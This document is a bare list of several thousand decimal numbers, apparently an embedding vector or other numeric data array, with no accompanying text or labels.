-0.003964022267609835, -0.009494077414274216, -0.0018304898403584957, -0.023490501567721367, -0.02886621281504631, -0.027119483798742294, 0.0026709153316915035, 0.025101710110902786, 0.01486978866159916, 0.042162440717220306, 0.023339921608567238, -0.007935573346912861, -0.0021081219892948866, -0.006139905191957951, 0.01191088929772377, 0.006531413644552231, -0.00426518265157938, 0.011022466234862804, -0.012716492637991905, 0.030191317200660706, -0.0018022560980170965, 0.009004692547023296, 0.004536226857453585, 0.010186746716499329, 0.023746488615870476, -0.016503583639860153, -0.04749297723174095, 0.010623428970575333, -0.023686256259679794, -0.05017330124974251, 0.001184877473860979, 0.020448783412575722, 0.0013316931435838342, -0.022556904703378677, -0.03737398982048035, -0.003113244427368045, -0.014982723630964756, 0.028489762917160988, 0.04065663740038872, -0.0007110206061042845, -0.0007481950451619923, -0.006350717507302761, 0.017873862758278847, 0.003228061832487583, -0.06625526398420334, 0.005846274085342884, -0.015035427175462246, -0.017030613496899605, -0.019153794273734093, 0.008801409043371677, 0.025975074619054794, -0.05204049497842789, -0.03550679609179497, 0.03342879191040993, 0.03156159818172455, -0.0012112290132790804, -0.016819801181554794, -0.027014076709747314, -0.0109170600771904, -0.008816467598080635, -0.0012667553965002298, 0.02210516482591629, -0.025056535378098488, -0.0028026727959513664, -0.01668427884578705, 0.0366210900247097, 0.0010606488212943077, 0.012166875414550304, 0.016413236036896706, -0.002499630209058523, -0.01820513792335987, 0.0035725138150155544, -0.030537651851773262, -0.02537275291979313, 0.006670700386166573, -0.02973957732319832, 0.007393484935164452, 0.030040737241506577, 0.04363812506198883, 0.012181933037936687, -0.01416959147900343, -0.03650062531232834, 0.02163836546242237, -0.0048260935582220554, -0.037253525108098984, -0.04670995846390724, 0.0023961064871400595, 0.0016394412377849221, 0.004031783435493708, 0.0000036431865737540647, -0.0036534506361931562, 0.013838314451277256, 0.00863577052950859, 0.011654903180897236, -0.0023979886900633574, -0.01053308043628931, -0.0014803910162299871, -0.010728835128247738, -0.02891138754785061, -0.013958779163658619, 0.009900644421577454, 0.0309893935918808, -0.01897309720516205, -0.006482474971562624, 0.004969144705682993, 0.002072359202429652, -0.008168972097337246, -0.014410519041121006, -0.014154532924294472, -0.015539870597422123, -0.013906075619161129, 0.001709084608592093, -0.004321650136262178, -0.011233278550207615, 0.013845844194293022, -0.024378923699259758, -0.011662431992590427, 0.004355530720204115, 0.03147124871611595, 0.010676131583750248, 0.019846461713314056, -0.015313999727368355, -0.01668427884578705, 0.004178598988801241, 0.02132214792072773, -0.054058268666267395, -0.0022869359236210585, -0.022632194682955742, 0.000760429713409394, -0.017497412860393524, 0.012332512997090816, 0.012166875414550304, 0.019575418904423714, -0.010307210497558117, 0.02621600218117237, -0.030251549556851387, -0.01831054501235485, -0.005541349295526743, 0.010548138990998268, -0.024529505521059036, 0.014862259849905968, 0.003299587406218052, -0.013747966848313808, -0.019078504294157028, -0.01950012892484665, 0.015569986775517464, 0.019725998863577843, -0.00956936739385128, 0.007032092660665512, 0.012370157986879349, 0.005247717723250389, 0.0297546349465847, -0.0367114394903183, 0.009667244739830494, 0.0029720754828304052, -0.0014502749545499682, -0.02299358695745468, -0.021804004907608032, 0.008906815201044083, -0.0356573760509491, -0.012814369983971119, 0.021051103249192238, -0.011602199636399746, -0.021292030811309814, 0.005454765632748604, -0.012731551192700863, 0.017542585730552673, -0.0017006144626066089, -0.005394533276557922, -0.014990252442657948, -0.0007011387497186661, 0.039963968098163605, -0.030206376686692238, 0.016353003680706024, -0.014832143671810627, -0.020780058577656746, 0.008379784412682056, 0.003045483259484172, 0.029092082753777504, -0.012513209134340286, -0.009938289411365986, -0.006328130140900612, -0.0007326664635911584, 0.016398176550865173, 0.02626117691397667, -0.004795977380126715, -0.012836956419050694, 0.014320171438157558, 0.004174834582954645, -0.012490622699260712, 0.012445448897778988, 0.0013476922176778316, -0.008951989002525806, -0.02507159300148487, 0.008455074392259121, 0.014071714133024216, -0.021201683208346367, -0.028986677527427673, 0.01648852601647377, 0.0354766808450222, -0.003448285162448883, -0.022496672347187996, 0.008176501840353012, -0.00213259132578969, 0.006181314587593079, 0.001166996080428362, -0.004615281242877245, 0.016864975914359093, -0.039963968098163605, 0.017136020585894585, 0.0019613062031567097, 0.05128759518265724, -0.031802523881196976, -0.02829400822520256, 0.005857567302882671, -0.00865835789591074, -0.027285121381282806, 0.00508207967504859, 0.0033127630595117807, -0.014222294092178345, -0.006670700386166573, 0.004656690638512373, -0.030537651851773262, -0.034663546830415726, -0.01794915273785591, -0.011850656941533089, 0.01757270283997059, 0.004566342569887638, -0.009448903612792492, -0.0067610484547913074, 0.021804004907608032, -0.01648852601647377, -0.002183411968871951, 0.03722340986132622, -0.02288818173110485, 0.009561838582158089, -0.00482232915237546, -0.007570416666567326, -0.038247354328632355, -0.016548756510019302, -0.00413342472165823, -0.015065543353557587, 0.024634910747408867, -0.03135078400373459, 0.015464580617845058, 0.01928931660950184, 0.002759380964562297, 0.02240632474422455, -0.001955659594386816, -0.019168851897120476, -0.007472539320588112, 0.013220936059951782, -0.011037523858249187, -0.016729453578591347, -0.020087391138076782, 0.010668602772057056, 0.1088995561003685, -0.025914842262864113, 0.010525551624596119, -0.027014076709747314, 0.025192057713866234, 0.01336398720741272, 0.0010945294052362442, 0.017979267984628677, -0.0053305369801819324, -0.012829427607357502, 0.015645276755094528, -0.013702793046832085, -0.013635031878948212, 0.007980747148394585, 0.024619853124022484, -0.0020140092819929123, -0.020087391138076782, -0.013793140649795532, 0.03210368752479553, -0.007510184310376644, 0.016985440626740456, -0.004348001442849636, 0.015539870597422123, -0.008846582844853401, 0.0252673476934433, -0.02100592851638794, -0.02355073392391205, -0.02782720886170864, -0.014967666007578373, -0.018942981958389282, -0.0047357454895973206, -0.004310356453061104, -0.024318693205714226, -0.014764382503926754, -0.0005820863298140466, 0.007822638377547264, 0.01575068198144436, -0.0034859301522374153, -0.018340660259127617, 0.0003119832254014909, -0.003617687849327922, -0.008560480549931526, -0.025101710110902786, -0.009817824698984623, 0.017497412860393524, -0.005710751749575138, 0.027842268347740173, 0.002330227755010128, -0.0027725568506866693, -0.0040129609405994415, 0.006520119961351156, -0.019575418904423714, 0.04722193256020546, 0.012385216541588306, 0.011956063099205494, 0.03421180695295334, 0.00632060132920742, -0.01170007698237896, -0.014154532924294472, -0.021548017859458923, -0.00586509658023715, 0.0103222681209445, -0.015283884480595589, 0.006836338434368372, 0.01814490742981434, -0.00826684944331646, -0.03141101822257042, -0.001146291266195476, -0.0074574812315404415, 0.027315236628055573, 0.019695881754159927, 0.01053308043628931, -0.008071095682680607, -0.002463867422193289, 0.01727154105901718, 0.003971551079303026, 0.006663171108812094, 0.034392502158880234, -0.015946436673402786, -0.01737694814801216, 0.03162182867527008, 0.03285658732056618, -0.016157248988747597, 0.016985440626740456, -0.009847940877079964, 0.031139973551034927, -0.006655642297118902, -0.013717850670218468, 0.0003926847712136805, -0.010073811747133732, -0.0011340567143633962, 0.013860901817679405, 0.022496672347187996, -0.0013025181833654642, 0.005402062553912401, 0.03165194392204285, 0.016503583639860153, -0.010254507884383202, -0.010006050579249859, -0.02657739445567131, 0.0037833258975297213, -0.006753519177436829, 0.020207853987812996, -0.011820540763437748, -0.0024544561747461557, 0.004848680458962917, -0.00863577052950859, 0.022737601771950722, 0.013635031878948212, -0.01782868802547455, -0.026968903839588165, -0.020569246262311935, 0.021397437900304794, -0.006399655714631081, -0.0020968285389244556, 0.033729951828718185, 0.008537894114851952, -0.02948359213769436, -0.015720566734671593, -0.0322241485118866, -0.011466677300632, -0.027104424312710762, 0.050263650715351105, -0.020765000954270363, 0.011722663417458534, -0.005567700602114201, -0.00571828056126833, -0.022195512428879738, 0.013763024471700191, 0.019515186548233032, 0.01913873478770256, 0.009727477096021175, 0.012422861531376839, -0.011361271142959595, 0.015946436673402786, -0.03246507793664932, 0.02007233165204525, 0.01591632142663002, -0.0029381948988884687, -0.0015585044166073203, -0.010495435446500778, 0.028775865212082863, 0.009750064462423325, 0.007438658736646175, 0.005243953317403793, -0.004137189127504826, 0.000499267247505486, 0.013635031878948212, 0.010796596296131611, 0.036018770188093185, 0.007092324551194906, -0.022752659395337105, 0.01648852601647377, 0.02252678945660591, -0.002706678118556738, 0.01746729575097561, 0.01986152119934559, -0.018325602635741234, 0.009659715928137302, 0.0010060635395348072, 0.011775366961956024, -0.005119724664837122, 0.013793140649795532, -0.003457696409896016, -0.010879415087401867, 0.02812837064266205, 0.004788448568433523, -0.06402667611837387, -0.004099544137716293, -0.02418317086994648, 0.0015265061520040035, -0.011052582412958145, -0.026487046852707863, 0.00980276707559824, 0.005981795955449343, -0.0039000255055725574, -0.002667150693014264, 0.030823754146695137, 0.020554188638925552, -0.03665120527148247, 0.0011444090632721782, 0.015208594501018524, 0.013401632197201252, -0.00030210139811970294, 0.017331773415207863, -0.027526048943400383, -0.011466677300632, -0.001729789306409657, -0.03656085953116417, 0.00488632544875145, 0.013266109861433506, 0.04902889207005501, -0.0004973850445821881, -0.014854731038212776, -0.006964331492781639, -0.013800669461488724, -0.020629478618502617, -0.01570550911128521, -0.010721306316554546, 0.016051843762397766, 0.006354481913149357, -0.01680474355816841, -0.002825259929522872, -0.0016017962479963899, 0.008191559463739395, -0.028007905930280685, -0.004852444864809513, 0.01541940588504076, 0.0012112290132790804, -0.002847846830263734, -0.0017457884969189763, 0.016578873619437218, 0.017226368188858032, -0.020825233310461044, -0.0039000255055725574, 0.009177859872579575, -0.004220008384436369, -0.01185818575322628, 0.014026540331542492, 0.0030868928879499435, 0.0033805242273956537, 0.017647992819547653, 0.010412616655230522, 0.005511233117431402, -0.0068702190183103085, 0.0050444346852600574, 0.03339867666363716, -0.043577890843153, 0.0034859301522374153, 0.013875959441065788, -0.028534935787320137, -0.017407063394784927, -0.021563075482845306, 0.01014157198369503, -0.012475564144551754, -0.010593312792479992, 0.024153053760528564, 0.00610978901386261, -0.003566866973415017, 0.004050605930387974, 0.011903359554708004, -0.013830785639584064, -0.0188827496021986, 0.014613802544772625, 0.0049126772210001945, -0.00023328157840296626, 0.00763064855709672, -0.015012839809060097, -0.004954086616635323, 0.027224889025092125, -0.0054585300385952, 0.008153914473950863, 0.004434585105627775, -0.022195512428879738, -0.004242595285177231, 0.011331155896186829, 0.0012046410702168941, -0.0011349978158250451, 0.01939472183585167, 0.007472539320588112, 0.010691190138459206, -0.013763024471700191, -0.005070785991847515, 0.010457790456712246, -0.01689509116113186, 0.01803950034081936, -0.00010499435302335769, -0.008168972097337246, 0.01757270283997059, 0.01508060097694397, 0.010292152874171734, 0.0010088869603350759, 0.0010926470858976245, 0.00015893262752797455, -0.001963188638910651, -0.0037099181208759546, 0.007589239161461592, -0.021352263167500496, -0.0008794821333140135, -0.003623334690928459, -0.027586281299591064, 0.07384449988603592, -0.01642829366028309, -0.025207115337252617, -0.005661813076585531, -0.04592694342136383, -0.027390526607632637, -0.013258581049740314, -0.02100592851638794, -0.0109170600771904, -0.0029080789536237717, 0.008537894114851952, -0.00826684944331646, -0.02142755314707756, 0.04902889207005501, 0.008078624494373798, -0.010661073960363865, 0.016654163599014282, -0.0034445207566022873, 0.009448903612792492, 0.013401632197201252, 0.05101655051112175, 0.01240027416497469, 0.00024563385522924364, -0.013341400772333145, -0.00241116457618773, 0.004001667257398367, -0.012836956419050694, 0.002537275431677699, -0.03650062531232834, 0.0019349547801539302, -0.0007825461798347533, -0.01638311892747879, -0.02782720886170864, -0.006234017666429281, -0.004020489752292633, -0.00610978901386261, -0.007506419904530048, -0.011060111224651337, -0.002134473528712988, 0.008560480549931526, -0.024981245398521423, -0.0009491254459135234, -0.02059936337172985, -0.01986152119934559, 0.008771292865276337, 0.007050915155559778, 0.013906075619161129, 0.0010502964723855257, -0.02017773874104023, 0.023129109293222427, 0.007081030867993832, 0.024002473801374435, -0.004871267359703779, 0.016654163599014282, -0.0006239664508029819, 0.018762284889817238, 0.010337326675653458, -0.010932117700576782, -0.013047768734395504, -0.034151576459407806, 0.02573414519429207, -0.004088250920176506, 0.012957421131432056, 0.011790424585342407, -0.006809986662119627, 0.0011199398431926966, 0.014674034900963306, 0.01511071715503931, -0.04499334469437599, -0.017407063394784927, -0.006700816098600626, 0.0008159561548382044, 0.020343376323580742, -0.006429771892726421, -0.01019427552819252, 0.011632315814495087, 0.015464580617845058, 0.014086771756410599, -0.016624046489596367, -0.01841595023870468, 0.0015265061520040035, -0.01861170493066311, -0.006373304408043623, 0.0189279243350029, -0.011090227402746677, 0.013168233446776867, 0.01200876571238041, 0.013845844194293022, -0.022752659395337105, -0.010269565507769585, 0.017181193456053734, 0.012987537309527397, 0.018159965053200722, -0.0017467295983806252, -0.010179216973483562, 0.009192917495965958, -0.006083437707275152, -0.0026332701090723276, 0.041530001908540726, 0.00650129746645689, -0.008108740672469139, -0.0025975073222070932, 0.009787709452211857, -0.0333685576915741, 0.007679587230086327, -0.006538942456245422, 0.012392745353281498, -0.005300420802086592, -0.006354481913149357, 0.007148792035877705, -0.008982105180621147, 0.01746729575097561, 0.03291681781411171, 0.020524073392152786, 0.0034144045785069466, -0.018476182594895363, -0.0042538889683783054, -0.015479638241231441, 0.012882131151854992, 0.0019020154140889645, 0.005955444648861885, 0.010472849011421204, 0.00813885685056448, 0.0229785293340683, 0.01021686289459467, 0.0073483106680214405, 0.006429771892726421, 0.0390002578496933, -0.02299358695745468, 0.01354468334466219, -0.0026012719608843327, 0.007209024392068386, -0.023806719109416008, -0.024951128289103508, -0.0028873742558062077, -0.003122655674815178, 0.008763764053583145, 0.0023283453192561865, -0.012332512997090816, 0.01302518229931593, -0.00923056248575449, -0.013077884912490845, -0.011526909656822681, 0.010209333151578903, -0.015396819449961185, 0.01191088929772377, -0.010661073960363865, -0.015253768302500248, -0.007495126221328974, -0.005157369654625654, 0.004954086616635323, 0.016789685934782028, -0.0067346966825425625, 0.002349050249904394, -0.0012215813621878624, -0.017392005771398544, -0.007126205135136843, -0.010239449329674244, -0.00241116457618773, 0.015186007134616375, -0.007431129924952984, -0.01575068198144436, -0.012340042740106583, -0.01835571974515915, -0.023595908656716347, -0.029257720336318016, -0.02225574478507042, -0.021909410133957863, 0.000023792837964720093, 0.012761666439473629, 0.0053305369801819324, 0.00868847407400608, 0.010698718950152397, 0.012708963826298714, -0.0065577649511396885, 0.005443471949547529, 0.001374043757095933, -0.012957421131432056, 0.014244881458580494, 0.003252530936151743, -0.020629478618502617, 0.0389099083840847, 0.006377068813890219, 0.006083437707275152, 0.013958779163658619, -0.022541847079992294, 0.013017653487622738, 0.0044496431946754456, -0.01203888189047575, 0.030748464167118073, -0.0048035066574811935, 0.014734266325831413, -0.0019330725772306323, -0.007167614530771971, -0.025704029947519302, -0.006983153987675905, -0.0161120742559433, -0.005424649454653263, -0.015539870597422123, 0.016503583639860153, 0.008274378255009651, -0.02168354019522667, 0.010676131583750248, 0.0031998278573155403, 0.01357479952275753, -0.01115798857063055, 0.009667244739830494, 0.01411688793450594, 0.019153794273734093, 0.004999260418117046, 0.02573414519429207, 0.005816157907247543, -0.005353123880922794, 0.028941502794623375, 0.017392005771398544, 0.010103926993906498, 0.014478280209004879, 0.0032544133719056845, -0.004107073415070772, -0.004863738548010588, -0.01493002101778984, 0.010510494001209736, 0.0014690974494442344, 0.0071563213132321835, -0.0028685517609119415, -0.012701435014605522, 0.015825971961021423, 0.0018606059020385146, -0.021307090297341347, -0.0011011172318831086, -0.005168663337826729, -0.002471396466717124, -0.0028704339638352394, 0.01243039034307003, 0.005063257180154324, -0.004415762610733509, 0.0016460291808471084, 0.004310356453061104, -0.0001805785286705941, 0.008823996409773827, 0.026065422222018242, -0.00020340083574410528, -0.020253028720617294, -0.0026144476141780615, -0.007065973244607449, 0.0021890588104724884, -0.00006611409480683506, -0.00964465830475092, -0.009742534719407558, 0.007547829300165176, 0.002832788974046707, -0.008718590252101421, -0.004396940115839243, 0.010397559031844139, 0.00035433389712125063, 0.0011698195012286305, -0.018702052533626556, 0.008394842967391014, -0.008515306748449802, -0.0005910270265303552, -0.01992175169289112, -0.008997163735330105, 0.018431009724736214, 0.013228464871644974, -0.014101830311119556, -0.008236733265221119, -0.006418478209525347, -0.009847940877079964, -0.003348525846377015, -0.011474207043647766, -0.0027010312769562006, 0.0051310183480381966, -0.01757270283997059, -0.006463652476668358, 0.004619045648723841, 0.00014105123409535736, 0.0034558142069727182, 0.0024939836002886295, 0.008620712906122208, 0.00956936739385128, -0.010864357464015484, 0.028896328061819077, -0.0034012289252132177, 0.005511233117431402, 0.02278277464210987, -0.004841151647269726, 0.010450261645019054, -0.00039550813380628824, -0.005379475653171539, -0.0062980144284665585, 0.005688164848834276, -0.0036421571858227253, -0.0013580446830019355, -0.016398176550865173, -0.0037927371449768543, 0.020403608679771423, -0.031019508838653564, 0.008568010292947292, 0.014222294092178345, 0.012912247329950333, 0.011263394728302956, -0.016910148784518242, -0.0027989083901047707, -0.015675392001867294, -0.026246117427945137, 0.021096277981996536, -0.024047648534178734, -0.01700049825012684, -0.0015585044166073203, -0.00312077347189188, 0.03851839900016785, -0.024348808452486992, 0.004841151647269726, 0.012490622699260712, -0.021728714928030968, -0.017693165689706802, -0.012550855055451393, -0.02204493246972561, 0.004588929936289787, -0.004348001442849636, 0.013333871029317379, -0.0031979456543922424, -0.008470132946968079, -0.02891138754785061, -0.0014841555384919047, 0.03755468502640724, -0.02318934164941311, -0.007559122983366251, -0.014674034900963306, 0.009102568961679935, 0.009268207475543022, -0.00190766213927418, -0.0020290673710405827, 0.007001976482570171, -0.011594670824706554, 0.008846582844853401, -0.009945818223059177, -0.004878796637058258, -0.021804004907608032, 0.014884847216308117, 0.00004543873365037143, -0.005819922313094139, 0.01737694814801216, 0.0023885774426162243, 0.005951679777354002, 0.014342757873237133, -0.031109856441617012, 0.02662256918847561, -0.00983288325369358, -0.006941744592040777, 0.0010418263264000416, 0.017753398045897484, 0.0005646755453199148, -0.0011312332935631275, 0.028519878163933754, -0.008703531697392464, -0.01591632142663002, 0.013883489184081554, 0.011406445875763893, -0.010623428970575333, -0.002736794063821435, -0.011662431992590427, 0.004731981083750725, -0.020825233310461044, 0.004596458747982979, 0.020870408043265343, 0.0062980144284665585, 0.006196372676640749, 0.008921872824430466, 0.014259939081966877, 0.0073746624402701855, -0.00795816071331501, 0.02074994333088398, 0.004713158588856459, -0.002725500613451004, 0.0021156510338187218, 0.0045588137581944466, 0.010691190138459206, -0.008372255600988865, 0.01617230661213398, 0.00016422646876890212, -0.018190080299973488, 0.000959007244091481, 0.01053308043628931, 0.010134043172001839, -0.017768455669283867, 0.014056655578315258, 0.01721131056547165, 0.0109170600771904, -0.0103222681209445, -0.005100902169942856, -0.013281168416142464, 0.004039312247186899, -0.026758091524243355, -0.016864975914359093, 0.0016253243666142225, -0.009817824698984623, -0.009079982526600361, -0.011022466234862804, 0.004114602226763964, -0.0011086462764069438, 0.007845224812626839, -0.013160704635083675, -0.008673416450619698, -0.036681320518255234, 0.009245620109140873, -0.007845224812626839, -0.009433845989406109, 0.008379784412682056, 0.007837696000933647, -0.022918296977877617, 0.022541847079992294, 0.009215504862368107, 0.006704580504447222, -0.03833770379424095, -0.007009505294263363, 0.010179216973483562, 0.0026069185696542263, 0.005364417564123869, 0.020644536241889, -0.0066029392182827, 0.014410519041121006, 0.023626023903489113, -0.003557455725967884, 0.0061624920926988125, 0.008793880231678486, 0.010856827720999718, 0.020358433946967125, 0.005974267143756151, 0.009930760599672794, -0.020765000954270363, 0.007649471051990986, -0.002373519353568554, 0.0013194584753364325, 0.01035238429903984, 0.010856827720999718, -0.008214146830141544, 0.02802296355366707, 0.0043404726311564445, -0.00920797511935234, 0.012746608816087246, 0.01668427884578705, -0.01809973269701004, 0.009320911020040512, 0.015735624358057976, -0.027751918882131577, -0.01767810806632042, -0.006889041513204575, 0.0020234205294400454, -0.0075666517950594425, 0.032886702567338943, 0.0188827496021986, -0.015645276755094528, -0.000025513334549032152, 0.0036590974777936935, 0.012829427607357502, -0.020734885707497597, -0.0014267468359321356, -0.012317455373704433, 0.03303728252649307, 0.002273760037496686, 0.0030172495171427727, -0.005624168086796999, -0.010103926993906498, 0.014056655578315258, -0.017196251079440117, 0.030236491933465004, -0.0177383404225111, 0.022481614723801613, -0.004178598988801241, 0.014967666007578373, -0.016247596591711044, -0.0068438672460615635, 0.02168354019522667, -0.0012686377158388495, -0.005906505975872278, 0.0009481842862442136, -0.0006371422205120325, -0.017979267984628677, -0.004370588343590498, 0.000844660447910428, 0.03177240863442421, 0.036169350147247314, -0.005737103521823883, -0.006444829981774092, -0.004615281242877245, -0.011715134605765343, -0.016353003680706024, -0.0014060420216992497, -0.015253768302500248, -0.006806222256273031, 0.031230321153998375, -0.0008634830010123551, 0.0026125654112547636, -0.019439896568655968, 0.011225749738514423, -0.016608988866209984, -0.0003190416609868407, -0.00203471421264112, 0.0026144476141780615, 0.006384598091244698, -0.0003298646188341081, 0.007250433787703514, 0.05646755173802376, -0.0038962610997259617, -0.004291533958166838, 0.01357479952275753, 0.009765122085809708, -0.006331895012408495, 0.00941125862300396, -0.009215504862368107, -0.027797093614935875, -0.004878796637058258, -0.012520738877356052, -0.006267898250371218, -0.02793261595070362, -0.00040044906199909747, -0.00020022453099954873, -0.013333871029317379, 0.016714395955204964, -0.028158485889434814, 0.011459148488938808, 0.002094946103170514, 0.010999878868460655, 0.01107516884803772, -0.005451001226902008, 0.006764812860637903, 0.016006669029593468, -0.004156011622399092, -0.0200271587818861, 0.01794915273785591, -0.0333685576915741, 0.001473803073167801, 0.002266230992972851, -0.00725419819355011, -0.012490622699260712, -0.0037212118040770292, 0.031170088797807693, -0.009298323653638363, 0.008997163735330105, -0.004374353215098381, -0.01269390620291233, -0.015690449625253677, -0.004043076653033495, -0.008733647875487804, 0.004355530720204115, -0.020403608679771423, 0.0026031541638076305, -0.0016243832651525736, 0.01302518229931593, -0.012550855055451393, -0.02163836546242237, -0.014854731038212776, -0.006471181288361549, -0.014094301499426365, -0.0020968285389244556, -0.003836028976365924, -0.01112787239253521, 0.025237230584025383, -0.004152247216552496, -0.004099544137716293, 0.009840412065386772, 0.0126110864803195, 0.014229822903871536, -0.00491644162684679, 0.016503583639860153, -0.013017653487622738, 0.0021100041922181845, -0.00395272858440876, -0.005213837139308453, 0.013085413724184036, -0.008078624494373798, -0.008048508316278458, 0.022556904703378677, 0.00566934235394001, 0.007084795739501715, -0.016458408907055855, -0.02397235855460167, -0.00012658143532462418, 0.01471920870244503, 0.011805483140051365, 0.002160825068131089, -0.023641081526875496, 0.00003873321111313999, -0.011534438468515873, -0.006399655714631081, -0.002650210401043296, -0.022707484662532806, 0.002104357350617647, -0.008455074392259121, -0.0013288697227835655, 0.00017093199130613357, 0.027631456032395363, -0.01560010202229023, -0.0008780704229138792, 0.009862999431788921, -0.01648852601647377, -0.024348808452486992, 0.03363960236310959, 0.015554928220808506, 0.009990992024540901, -0.013062827289104462, -0.007980747148394585, 0.007378426846116781, -0.010593312792479992, -0.005530055612325668, 0.02401753142476082, -0.004167305305600166, -0.000026483870897209272, -0.0052627758122980595, -0.004137189127504826, 0.003408757969737053, 0.042463600635528564, 0.03141101822257042, -0.009765122085809708, 0.0069530378095805645, 0.0059441509656608105, 0.004747038707137108, 0.004920206032693386, -0.001205582288093865, 0.014907433651387691, -0.004125895909965038, 0.031079741194844246, 0.00006699639925500378, 0.034031111747026443, -0.008229204453527927, 0.00169967336114496, -0.011391387321054935, 0.006316836923360825, 0.016578873619437218, 0.005737103521823883, -0.0200271587818861, 0.014207236468791962, 0.003706153715029359, 0.0027047956828027964, -0.009561838582158089, -0.02901679277420044, -0.0056844004429876804, 0.007438658736646175, 0.02912219986319542, -0.004453407600522041, -0.001223463681526482, 0.002232350641861558, 0.007698409724980593, -0.014274997636675835, 0.0211715679615736, -0.0068852766416966915, -0.0027405584696680307, -0.0177383404225111, -0.011925946921110153, -0.007227846886962652, 0.020042216405272484, 0.02585460990667343, -0.03761491924524307, 0.012754137627780437, 0.0028403177857398987, -0.005447236355394125, -0.0038096774369478226, -0.006554000545293093, -0.00606085080653429, 0.0016234421636909246, 0.013537154532968998, -0.008221675641834736, -0.011459148488938808, -0.017482353374361992, -0.004890089854598045, 0.006670700386166573, -0.0038774386048316956, 0.0011594670359045267, 0.007837696000933647, 0.01695532351732254, -0.028053080663084984, -0.008944460190832615, -0.034031111747026443, -0.006538942456245422, -0.01188077311962843, 0.008063566870987415, 0.024047648534178734, -0.008620712906122208, -0.010518022812902927, -0.011986179277300835, 0.002943841740489006, 0.0006456123664975166, -0.009275736287236214, -0.02204493246972561, -0.03120020404458046, -0.009192917495965958, 0.001422982313670218, -0.020418666303157806, -0.012377687729895115, -0.0037419165018945932, 0.018551472574472427, 0.0038510870654135942, 0.006934215314686298, 0.0014173355884850025, -0.015946436673402786, -0.0038190886843949556, -0.013266109861433506, -0.014335229061543941, -0.01782868802547455, -0.0043404726311564445, -0.01674451120197773, -0.016985440626740456, -0.011014937423169613, -0.02876080572605133, 0.003685449017211795, -0.0005726750823669136, 0.015005310997366905, -0.0012535796267911792, 0.0018878985429182649, -0.03369983658194542, 0.01076648011803627, -0.005917799659073353, 0.019891636446118355, -0.0026257410645484924, -0.008191559463739395, -0.005326772574335337, 0.007329488173127174, -0.01302518229931593, -0.009298323653638363, -0.012490622699260712, -0.019214026629924774, 0.005289127584546804, -0.001185818575322628, -0.017753398045897484, -0.005514997523277998, 0.024424098432064056, 0.009238091297447681, -0.0026822087820619345, 0.019846461713314056, 0.04083733260631561, -0.018762284889817238, -0.008040979504585266, 0.008944460190832615, 0.0028290243353694677, -0.02481560781598091, 0.015991611406207085, -0.016036784276366234, -0.009742534719407558, 0.009878057055175304, -0.00956936739385128, -0.0009467726340517402, -0.023746488615870476, -0.016985440626740456, -0.027420643717050552, -0.015841031447052956, -0.024890897795557976, 0.014621331356465816, -0.0019500127527862787, 0.017693165689706802, -0.009034808725118637, 0.011797954328358173, -0.007476303726434708, 0.011632315814495087, 0.017392005771398544, 0.00217211851850152, 0.02579437755048275, 0.0050858440808951855, 0.02579437755048275, 0.0014267468359321356, -0.015155890956521034, -0.0049089123494923115, 0.012904717586934566, -0.011511852033436298, 0.001226286985911429, -0.02007233165204525, -0.006185078993439674, 0.0016083840746432543, -0.0017429650761187077, -0.008921872824430466, 0.023309806361794472, -0.019876578822731972, -0.02382177859544754, -0.01089447271078825, -0.012739080004394054, 0.018762284889817238, 0.003625216893851757, -0.0028986677061766386, -0.0032845293171703815, -0.004287769552320242, -0.015615160576999187, -0.005217602010816336, 0.0023848130367696285, 0.021924467757344246, -0.003527339780703187, -0.01924414187669754, -0.01689509116113186, -0.023264631628990173, 0.031019508838653564, 0.01668427884578705, 0.017858805134892464, -0.006264133844524622, -0.0006997270975261927, -0.007427365519106388, -0.00046726898290216923, -0.009878057055175304, -0.014892376028001308, 0.011925946921110153, -0.006328130140900612, -0.009486548602581024, -0.004257653374224901, 0.022797832265496254, -0.004999260418117046, -0.0054811169393360615, 0.0020384786184877157, 0.010096398182213306, -0.0041221315041184425, 0.023595908656716347, 0.013145646080374718, -0.004773390479385853, -0.0062754275277256966, 0.005213837139308453, -0.010292152874171734, -0.007412307430058718, -0.012543325312435627, 0.01323599461466074, 0.023490501567721367, 0.011112813837826252, -0.02210516482591629, -0.0033071162179112434, 0.014711679890751839, 0.012814369983971119, 0.020358433946967125, -0.00964465830475092, -0.0013119294308125973, -0.008786351419985294, 0.012309926562011242, 0.006644348613917828, -0.00901975017040968, 0.0038699095603078604, -0.007668293546885252, 0.007314430084079504, -0.00844754558056593, 0.0008987751789391041, -0.014756853692233562, -0.007506419904530048, -0.018596647307276726, 0.009682303294539452, -0.021201683208346367, -0.014448164030909538, -0.008206618018448353, 0.003615805646404624, 0.004325414542108774, 0.003773914650082588, -0.011323626153171062, 0.010126514360308647, -0.006026970222592354, 0.016202423721551895, -0.034151576459407806, -0.002273760037496686, -0.007544064894318581, -0.015886204317212105, 0.017136020585894585, -0.002463867422193289, -0.002866669325158, 0.0012611086713150144, -0.007013270165771246, -0.009132685139775276, -0.002134473528712988, -0.016458408907055855, -0.016307828947901726, 0.022029874846339226, -0.0013571034651249647, -0.01110528502613306, 0.002539157634600997, -0.008462604135274887, -0.024725258350372314, -0.011850656941533089, -0.0041635408997535706, -0.042975571006536484, -0.0004752685781568289, 0.00478468369692564, 0.006034499034285545, -0.0006220841896720231, 0.007656999863684177, -0.02528240531682968, -0.0048260935582220554, 0.020945698022842407, -0.00006876100815134123, 0.022797832265496254, -0.0008846583077684045, -0.000835249200463295, 0.012159346602857113, 0.0014879199443385005, -0.015306470915675163, 0.0012695788173004985, 0.010796596296131611, -0.011888301931321621, -0.000013646324987348635, -0.012189461849629879, -0.011534438468515873, -0.013800669461488724, 0.03363960236310959, 0.022225627675652504, 0.025357695296406746, 0.004942792933434248, -0.007216553203761578, -0.020795118063688278, 0.009697360917925835, -0.0004983261460438371, -0.011632315814495087, 0.0022850537206977606, 0.0010502964723855257, 0.006113553885370493, -0.006930450908839703, -0.01484720129519701, -0.011240807361900806, 0.004442113917320967, 0.028113311156630516, -0.0025975073222070932, 0.0027424406725913286, -0.0012996948789805174, 0.019725998863577843, 0.0053305369801819324, -0.02516194060444832, 0.0006634937599301338, -0.013552212156355381, 0.018280429765582085, 0.008161443285644054, -0.002260584384202957, -0.006949273403733969, 0.00926067866384983, -0.010051224380731583, -0.004366823937743902, -0.003911319188773632, -0.010698718950152397, -0.00850024912506342, 0.011444090865552425, 0.00490138353779912, -0.01373290829360485, 0.01752752810716629, 0.008440016768872738, 0.004814799875020981, 0.009719948284327984, 0.008048508316278458, 0.021608250215649605, 0.0033466436434537172, 0.025192057713866234, 